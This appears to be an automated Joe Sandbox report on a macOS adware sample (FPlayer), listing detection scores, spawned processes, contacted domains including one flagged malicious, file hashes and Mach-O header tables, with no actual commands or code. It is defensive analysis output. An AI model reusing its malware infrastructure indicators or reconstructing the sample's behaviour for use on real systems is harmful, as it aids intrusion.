macOS
Analysis Report
malw_sampl
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Analysis Advice
Exit code suggests that the sample could not be started, look at standard output/error streams for possible reason. |
Non-zero exit code suggests an error during the execution. Lookup the error code for hints. |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1428695 |
Start date and time: | 2024-04-19 11:44:17 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultmacfilecookbook.jbs |
Analysis system description: | Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099) |
macOS major version: | 10.14 |
CPU architecture: | x86_64 |
Analysis Mode: | default |
Sample name: | malw_sampl |
Detection: | MAL |
Classification: | mal68.mac@0/4@4/0 |
- Excluded IPs from analysis (whitelisted): 17.253.83.204, 17.253.83.198, 23.62.177.105, 17.253.83.205, 17.57.21.63, 184.28.78.153, 184.28.78.137, 23.62.128.29
- Excluded domains from analysis (whitelisted): mesu-cdn.apple.com.akadns.net, e11408.d.akamaiedge.net, updates.cdn-apple.com.akadns.net, gateway.icloud.com, e673.dsce9.akamaiedge.net, lcdn-locator-usms11.apple.com.akadns.net, help-ar.apple.com.edgekey.net, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, a1943.dscgi3.akamai.net, mesu-cdn.origin-apple.com.akadns.net, lcdn-locator.apple.com.akadns.net, help.origin-apple.com.akadns.net, lcdn-locator.apple.com, mesu.g.aaplimg.com, updates.g.aaplimg.com, itunes.apple.com.edgekey.net, help.apple.com, mesu.apple.com, init.itunes.apple.com, init-cdn.itunes-apple.com.akadns.net, updates.cdn-apple.com.edgesuite.net
Command: | /Users/bernard/Desktop/malw_sampl |
PID: | 620 |
Exit Code: | 255 |
Exit Code Info: | |
Killed: | False |
Standard Output: | |
Standard Error: |
- System is macvm-mojave
- xpcproxy New Fork (PID: 611, Parent: 1)
- mono-sgen32 New Fork (PID: 620, Parent: 537)
- sh New Fork (PID: 623, Parent: 620)
- sh New Fork (PID: 624, Parent: 620)
- sh New Fork (PID: 625, Parent: 624)
- system_profiler New Fork (PID: 627, Parent: 625)
- sh New Fork (PID: 626, Parent: 624)
- xpcproxy New Fork (PID: 651, Parent: 1)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MacOS_Trojan_Fplayer_1c1fae37 | unknown | unknown |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MacOS_Trojan_Fplayer_1c1fae37 | unknown | unknown |
| |
MacOS_Trojan_Fplayer_1c1fae37 | unknown | unknown |
|
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Curl executable: | Jump to behavior | ||
Source: | Curl executable: | Jump to behavior | ||
Source: | Curl executable: | Jump to behavior | ||
Source: | Curl executable: | Jump to behavior |
Source: | Awk executable: | Jump to behavior |
Source: | Mach-O header: |
Source: | Random device file read: | Jump to behavior |
Source: | CodeSign Info: |
Source: | Submission file: |
Source: | Sysctl read request: | Jump to behavior |
Source: | Defaults executable: | Jump to behavior |
Source: | Sysctl read request: | Jump to behavior | ||
Source: | Sysctl read request: | Jump to behavior |
Source: | Sysctl requested: | Jump to behavior | ||
Source: | Sysctl requested: | Jump to behavior | ||
Source: | Sysctl requested: | Jump to behavior | ||
Source: | Sysctl requested: | Jump to behavior | ||
Source: | Sysctl requested: | Jump to behavior | ||
Source: | Sysctl requested: | Jump to behavior |
Source: | Defaults executable: | Jump to behavior |
Source: | System_profiler executable: | Jump to behavior | ||
Source: | System_profiler executable: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 1 Scripting | Path Interception | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Invalid Code Signature | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Code Signing | Security Account Manager | 5 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira | PUA/OSX.FPlayer.A | ||
44% | Virustotal | Browse | ||
34% | ReversingLabs | MacOS.PUA.FPlayer | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
2% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
apis.apple.map.fastly.net | 151.101.131.6 | true | false |
| unknown |
gateway.fe2.apple-dns.net | 17.248.193.16 | true | false |
| unknown |
api.appsreforoma.com | unknown | unknown | true |
| unknown |
updates.cdn-apple.com | unknown | unknown | false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.229.211.108 | unknown | United States | 15133 | EDGECASTUS | false | |
151.101.131.6 | apis.apple.map.fastly.net | United States | 54113 | FASTLYUS | false | |
151.101.195.6 | unknown | United States | 54113 | FASTLYUS | false | |
151.101.67.6 | unknown | United States | 54113 | FASTLYUS | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
192.229.211.108 | Get hash | malicious | AteraAgent | Browse | ||
Get hash | malicious | AteraAgent | Browse | |||
Get hash | malicious | AteraAgent | Browse | |||
Get hash | malicious | Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | ScreenConnect Tool | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Glupteba, Mars Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, Vidar | Browse | |||
Get hash | malicious | Glupteba, Mars Stealer, Vidar | Browse | |||
151.101.131.6 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | DDosia | Browse | |||
151.101.195.6 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
151.101.67.6 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | AMOS Stealer | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
apis.apple.map.fastly.net | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
FASTLYUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | PayPal Phisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
FASTLYUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | PayPal Phisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
EDGECASTUS | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
FASTLYUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | PayPal Phisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
5c118da645babe52f060d0754256a73c | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Process: | /usr/bin/curl |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 3.651111449487769 |
Encrypted: | false |
SSDEEP: | 6:I2swj2SAykymUeX/8UniGdCSgOgcvRFNaA3YKVGh:Vz6ykymUe0bSc9cvRVm |
MD5: | 81F6B9B694BBADD68BAFF38716A1290E |
SHA1: | 570A457C8B101350A3DB0F489C3977E7B8852E62 |
SHA-256: | 6E1DB63E25FBCC998A7326497F61DC15E67EC696153AAA473FE6B5A276A8E859 |
SHA-512: | D7CE37C8B6ECE36A1F47F3241C6C30E9E57845E3D24E551A88C47E524703E65D4C1AC18AAE86F0D137BB265FA1BD972B0B970FEC913F80CBDB2C29A630F4E1D4 |
Malicious: | false |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 5.933933117666083 |
TrID: |
|
File name: | malw_sampl |
File size: | 47'222 bytes |
MD5: | d3e39930bca4c4b57f6e1f241f0a31c8 |
SHA1: | ca71f4ee36076497b3989e61352da70fa4dfca8b |
SHA256: | 02cfb65e0e38ef9ce7e431c66cdc53be3392bfe9bbed4840e18a8b30a1fd8d4a |
SHA512: | b2b8812abc8551946018af4912d183a3b2cab4981526d8cd61fda90320eb4c882094d0fd9f0deaf62184c710f97bdff731f5943e80d90e9510b9d0af64f14abf |
SSDEEP: | 768:vKSrm5inFlv7aY1taE7A8sHlP/Tq80oTyq78WA76ZW0WAiJYD3ab8X:bFlWUtpc1/rAq78WA76ZW0WAimD3Kq |
TLSH: | 5B23291207755A11E9C095B472CA73B3CE22FA352EA1174B2792CA942FF7BF57B09206 |
File Content Preview: | ..........................!.........H...__PAGEZERO..........................................................x...__TEXT...................`...............`......................__text..........__TEXT..................b:..................................... |
|
General Information for header 1 | |
Endian: | |
Size: | |
Architecture: | |
Filetype: | |
Nbr. of load commands: | 19 |
Entry point: |
Name | Value |
---|---|
segname | __PAGEZERO |
vmaddr | 0x0 |
vmsize | 0x100000000 |
fileoff | 0x0 |
filesize | 0x0 |
maxprot | 0x0 |
initprot | 0x0 |
nsects | 0 |
flags | 0x0 |
Name | Value | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
segname | __TEXT | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
vmaddr | 0x100000000 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
vmsize | 0x6000 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
fileoff | 0x0 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
filesize | 0x6000 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
maxprot | 0x7 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
initprot | 0x5 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
nsects | 7 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
flags | 0x0 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Datas |
|
Name | Value | ||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
segname | __DATA | ||||||||||||||||||||||||||||||||||||||||||||||||||
vmaddr | 0x100006000 | ||||||||||||||||||||||||||||||||||||||||||||||||||
vmsize | 0x1000 | ||||||||||||||||||||||||||||||||||||||||||||||||||
fileoff | 0x6000 | ||||||||||||||||||||||||||||||||||||||||||||||||||
filesize | 0x1000 | ||||||||||||||||||||||||||||||||||||||||||||||||||
maxprot | 0x7 | ||||||||||||||||||||||||||||||||||||||||||||||||||
initprot | 0x3 | ||||||||||||||||||||||||||||||||||||||||||||||||||
nsects | 4 | ||||||||||||||||||||||||||||||||||||||||||||||||||
flags | 0x0 | ||||||||||||||||||||||||||||||||||||||||||||||||||
Datas |
|
Name | Value |
---|---|
segname | __LINKEDIT |
vmaddr | 0x100007000 |
vmsize | 0x5000 |
fileoff | 0x7000 |
filesize | 0x4850 |
maxprot | 0x7 |
initprot | 0x1 |
nsects | 0 |
flags | 0x0 |
Name | Value |
---|---|
rebase_off | 28672 |
rebase_size | 32 |
bind_off | 28704 |
bind_size | 1144 |
weak_bind_off | 29848 |
weak_bind_size | 88 |
lazy_bind_off | 29936 |
lazy_bind_size | 2088 |
export_off | 32024 |
export_size | 32 |
Name | Value |
---|---|
symoff | 32112 |
nsyms | 96 |
stroff | 34228 |
strsize | 2784 |
Name | Value |
---|---|
ilocalsym | 0 |
nlocalsym | 0 |
iextdefsym | 0 |
nextdefsym | 1 |
iundefsym | 1 |
nundefsym | 95 |
tocoff | 0 |
ntoc | 0 |
modtaboff | 0 |
nmodtab | 0 |
extrefsymoff | 0 |
nextrefsyms | 0 |
indirectsymoff | 33648 |
nindirectsyms | 145 |
extreloff | 0 |
nextrel | 0 |
locreloff | 0 |
nlocrel | 0 |
Name | Value |
---|
Name | Value |
---|---|
uuid | 55dff74a-95f4-310a-add8-2016c1e36991 |
Name | Value |
---|---|
version | 10.9.0 |
sdk | 10.13.0 |
Name | Value |
---|---|
path | 0.0.0.0.0 |
Name | Value |
---|
Name | Value |
---|---|
compatibility_version | 1.0.0 |
current_version | 400.9.0 |
timestamp | 1970-01-01 |
Datas |
Name | Value |
---|---|
compatibility_version | 1.0.0 |
current_version | 50.0.0 |
timestamp | 1970-01-01 |
Datas |
Name | Value |
---|---|
compatibility_version | 1.0.0 |
current_version | 1252.0.0 |
timestamp | 1970-01-01 |
Datas |
Name | Value |
---|---|
compatibility_version | 150.0.0 |
current_version | 1443.13.0 |
timestamp | 1970-01-01 |
Datas |
Name | Value |
---|---|
dataoff | 32056 |
datasize | 56 |
Name | Value |
---|---|
dataoff | 32112 |
datasize | 0 |
Name | Value |
---|---|
dataoff | 37024 |
datasize | 10160 |
Name | Category | Origin | Segment Name | Bind Address | Library Name |
---|---|---|---|---|---|
__mh_execute_header | EXTERNAL | LC_SYMTAB | |||
_CFBundleCopyBundleURL | UNDEFINED | LC_SYMTAB | __DATA | 0x100006058 | /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation |
_CFBundleGetMainBundle | UNDEFINED | LC_SYMTAB | __DATA | 0x100006060 | /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation |
_CFRelease | UNDEFINED | LC_SYMTAB | __DATA | 0x100006068 | /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation |
_CFStringGetCString | UNDEFINED | LC_SYMTAB | __DATA | 0x100006070 | /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation |
_CFStringGetCStringPtr | UNDEFINED | LC_SYMTAB | __DATA | 0x100006078 | /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation |
_CFStringGetLength | UNDEFINED | LC_SYMTAB | __DATA | 0x100006080 | /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation |
_CFURLCopyPath | UNDEFINED | LC_SYMTAB | __DATA | 0x100006088 | /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation |
_CFURLCopyResourcePropertyForKey | UNDEFINED | LC_SYMTAB | __DATA | 0x100006090 | /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation |
_TransformProcessType | UNDEFINED | LC_SYMTAB | __DATA | 0x100006098 | /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices |
__Unwind_Resume | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060A0 | /usr/lib/libSystem.B.dylib |
__ZNKSt3__120__vector_base_commonILb1EE20__throw_length_errorEv | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060A8 | /usr/lib/libc++.1.dylib |
__ZNKSt3__120__vector_base_commonILb1EE20__throw_out_of_rangeEv | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060B0 | /usr/lib/libc++.1.dylib |
__ZNKSt3__121__basic_string_commonILb1EE20__throw_length_errorEv | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060B8 | /usr/lib/libc++.1.dylib |
__ZNKSt3__16locale9has_facetERNS0_2idE | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060C0 | /usr/lib/libc++.1.dylib |
__ZNKSt3__16locale9use_facetERNS0_2idE | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060C8 | /usr/lib/libc++.1.dylib |
__ZNKSt3__18ios_base6getlocEv | UNDEFINED | LC_SYMTAB | |||
__ZNKSt9exception4whatEv | UNDEFINED | LC_SYMTAB | |||
__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKc | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060D0 | /usr/lib/libc++.1.dylib |
__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcm | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060D8 | /usr/lib/libc++.1.dylib |
__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7reserveEm | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060E0 | /usr/lib/libc++.1.dylib |
__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_ | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060E8 | /usr/lib/libc++.1.dylib |
__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_mmRKS4_ | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060F0 | /usr/lib/libc++.1.dylib |
__ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED0Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006290 | /usr/lib/libc++.1.dylib |
__ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED1Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006288 | /usr/lib/libc++.1.dylib |
__ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED2Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x1000060F8 | /usr/lib/libc++.1.dylib |
__ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEE3putEc | UNDEFINED | LC_SYMTAB | |||
__ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEE5flushEv | UNDEFINED | LC_SYMTAB | |||
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE5uflowEv | UNDEFINED | LC_SYMTAB | __DATA | 0x100006390 | /usr/lib/libc++.1.dylib |
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6xsgetnEPcl | UNDEFINED | LC_SYMTAB | __DATA | 0x100006380 | /usr/lib/libc++.1.dylib |
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6xsputnEPKcl | UNDEFINED | LC_SYMTAB | __DATA | 0x1000063A0 | /usr/lib/libc++.1.dylib |
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE9showmanycEv | UNDEFINED | LC_SYMTAB | __DATA | 0x100006378 | /usr/lib/libc++.1.dylib |
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEEC2Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006100 | /usr/lib/libc++.1.dylib |
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEED2Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006108 | /usr/lib/libc++.1.dylib |
__ZNSt3__119__shared_weak_count16__release_sharedEv | UNDEFINED | LC_SYMTAB | __DATA | 0x100006110 | /usr/lib/libc++.1.dylib |
__ZNSt3__119__shared_weak_countD2Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006118 | /usr/lib/libc++.1.dylib |
__ZNSt3__14coutE | UNDEFINED | LC_SYMTAB | |||
__ZNSt3__15ctypeIcE2idE | UNDEFINED | LC_SYMTAB | |||
__ZNSt3__16localeC1ERKS0_ | UNDEFINED | LC_SYMTAB | __DATA | 0x100006120 | /usr/lib/libc++.1.dylib |
__ZNSt3__16localeD1Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006128 | /usr/lib/libc++.1.dylib |
__ZNSt3__17codecvtIcc11__mbstate_tE2idE | UNDEFINED | LC_SYMTAB | __DATA | 0x100006010 | /usr/lib/libc++.1.dylib |
__ZNSt3__18ios_base4initEPv | UNDEFINED | LC_SYMTAB | __DATA | 0x100006130 | /usr/lib/libc++.1.dylib |
__ZNSt3__18ios_base5clearEj | UNDEFINED | LC_SYMTAB | __DATA | 0x100006138 | /usr/lib/libc++.1.dylib |
__ZNSt3__19basic_iosIcNS_11char_traitsIcEEED2Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006140 | /usr/lib/libc++.1.dylib |
__ZNSt8bad_castC1Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006148 | /usr/lib/libc++.1.dylib |
__ZNSt8bad_castD1Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006018 | /usr/lib/libc++.1.dylib |
__ZNSt9exceptionD0Ev | UNDEFINED | LC_SYMTAB | |||
__ZNSt9exceptionD1Ev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006150 | /usr/lib/libc++.1.dylib |
__ZSt9terminatev | UNDEFINED | LC_SYMTAB | __DATA | 0x100006158 | /usr/lib/libc++.1.dylib |
__ZTINSt3__113basic_istreamIcNS_11char_traitsIcEEEE | UNDEFINED | LC_SYMTAB | __DATA | 0x1000063E0 | /usr/lib/libc++.1.dylib |
__ZTINSt3__115basic_streambufIcNS_11char_traitsIcEEEE | UNDEFINED | LC_SYMTAB | __DATA | 0x1000063C0 | /usr/lib/libc++.1.dylib |
__ZTINSt3__119__shared_weak_countE | UNDEFINED | LC_SYMTAB | __DATA | 0x100006430 | /usr/lib/libc++.1.dylib |
__ZTISt8bad_cast | UNDEFINED | LC_SYMTAB | __DATA | 0x100006020 | /usr/lib/libc++.1.dylib |
__ZTISt9exception | UNDEFINED | LC_SYMTAB | __DATA | 0x100006028 | /usr/lib/libc++.1.dylib |
__ZTVN10__cxxabiv120__si_class_type_infoE | UNDEFINED | LC_SYMTAB | __DATA | 0x100006420 | /usr/lib/libc++.1.dylib |
__ZTVSt9exception | UNDEFINED | LC_SYMTAB | __DATA | 0x100006030 | /usr/lib/libc++.1.dylib |
